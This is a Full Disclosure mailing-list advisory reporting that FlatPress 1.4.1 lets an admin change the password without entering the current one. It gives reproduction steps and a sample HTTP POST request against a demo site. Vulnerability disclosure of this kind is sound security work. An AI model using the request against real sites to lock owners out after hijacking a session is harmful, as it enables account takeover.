Current Password not Required When Changing Password - flatpressv1.4.1

[Andrey Stoykov <mwebsec () gmail com>]

# Exploit Title: Current Password not Required When Changing Password -
flatpressv1.4.1
# Date: 09/2025
# Exploit Author: Andrey Stoykov
# Version: 1.4.1
# Tested on: Debian 12
# Blog:
https://msecureltd.blogspot.com/2025/09/friday-fun-pentest-series-42-current.html

Current Password not Required When Changing Password:

Steps to Reproduce:

- Login with admin user and visit "Main" > "Configuration" > "General
Settings"
- Current password would not be required when changing the password


// HTTP POST Request

POST /FlatPressc4hak4mvef/admin.php?p=config&action=default HTTP/1.1
Host: demos5.softaculous.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0)
Gecko/20100101 Firefox/144.0
[...]

_wpnonce=c1d6797fb9&_wp_http_referer=%2FFlatPressc4hak4mvef%2Fadmin.php%3Fp%3Dconfig&admin=admin&password=&confirm_password=&title=FlatPress&subtitle=My+FlatPress+blog&blogfooter=&author=test&www=http%3A%2F%
2Fdemos5.softaculous.com%2FFlatPressc4hak4mvef%2F&email=demos%
40softaculous.com
&notify=on&startpage=%3ANULL%3A&maxentries=5&timeoffset=0&dateformat=%25A%2C+%25B+%25e%2C+%25Y&dateformatshort=%25Y-%25m-%25d&timeformat=%25H%3A%25M%3A%25S&lang=en-us&charset=utf-8&save=Save+Changes


// HTTP Response

HTTP/1.1 200 OK
Date: Sun, 21 Sep 2025 15:14:16 GMT
Server: FlatPress
[...]
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/